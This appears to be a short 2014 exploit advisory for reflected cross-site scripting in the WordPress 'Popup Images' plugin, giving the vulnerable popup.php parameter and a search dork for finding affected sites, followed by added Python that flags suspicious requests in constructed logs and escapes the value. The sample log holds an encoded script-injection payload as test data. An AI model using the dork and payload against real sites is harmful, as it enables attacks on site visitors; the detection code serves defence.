[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Exploit Title: Wordpress Plugin Popup Images Cross Site Scripting
[+]
[+] Exploit Author: Milad Hacking
[+]
[+] Date: 2014-06-1
[+]
[+] Google Dork : inurl:/wp-content/plugins/popup-images
[+]
[+] Vendor Homepage : http://www.Wordpress.org
[+]
[+] Tested on: Windows 7 , Mozilla FireFox
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Location : [localhost]/wp-content/plugins/popup-images/popup.php?z=[XSS]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Discovered By : Milad Hacking
We Love Mohammad
Mail : milad.hacking.blackhat@gmail.com
Home Page : https://www.facebook.com/milad.hacking.5
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
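Added example, not part of the advisory and not the plugin's own code: a log check that flags requests to the popup.php endpoint above whose z parameter carries attribute-breakout characters (including double-encoded ones), plus the escaping that neutralizes such a value. It assumes z is reflected into an HTML attribute, which is what an attribute-closing payload targets; the log lines, IPs and host paths are constructed.

```python
import re
from html import escape
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (placeholder IPs); the third request is double-encoded.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jun/2014:10:00:01 +0000] "GET /wp-content/plugins/popup-images/popup.php?z=photo.jpg HTTP/1.1" 200 512
192.0.2.11 - - [01/Jun/2014:10:00:05 +0000] "GET /wp-content/plugins/popup-images/popup.php?z=%22/%3E%3Cscript%3Ealert%281%29%3C/script%3E HTTP/1.1" 200 640
192.0.2.12 - - [01/Jun/2014:10:00:09 +0000] "GET /wp-content/plugins/popup-images/popup.php?z=%2522%253E HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Any of these characters lets a value close an attribute or open a tag.
BREAKOUT_RE = re.compile(r'["\'<>]')

def decode_fully(value, rounds=3):
    """URL-decode repeatedly so double-encoded payloads (%2522 -> %22 -> ") are not missed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_popup_requests(log_text):
    """Return (client_ip, decoded_z) for popup.php requests whose z value could break out of an attribute."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/plugins/popup-images/popup.php"):
            continue
        # parse_qs decodes one layer; decode_fully handles the rest.
        for z in parse_qs(url.query, keep_blank_values=True).get("z", []):
            z = decode_fully(z)
            if BREAKOUT_RE.search(z):
                hits.append((line.split()[0], z))
    return hits

def render_img_tag(z):
    """Hypothetical hardened rendering: escape quotes and angle brackets before the value lands in an attribute."""
    return '<img src="%s" />' % escape(z, quote=True)
```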